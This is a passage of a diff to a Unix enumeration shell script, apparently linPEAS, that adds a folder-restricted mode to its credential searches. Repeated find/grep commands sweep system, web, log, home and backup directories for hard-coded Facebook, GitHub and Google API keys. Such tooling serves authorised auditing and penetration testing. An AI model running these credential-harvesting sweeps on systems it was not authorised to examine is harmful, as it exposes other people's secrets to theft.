"[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +print_3title_no_nl "Searching Facebook Oauth (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Facebook Secret Key (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +print_3title_no_nl "Searching Facebook Secret Key (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Github (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +print_3title_no_nl "Searching Github (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Google API Key (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +print_3title_no_nl "Searching Google API Key (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Google Cloud Platform API Key (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +print_3title_no_nl "Searching Google Cloud Platform API Key (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | 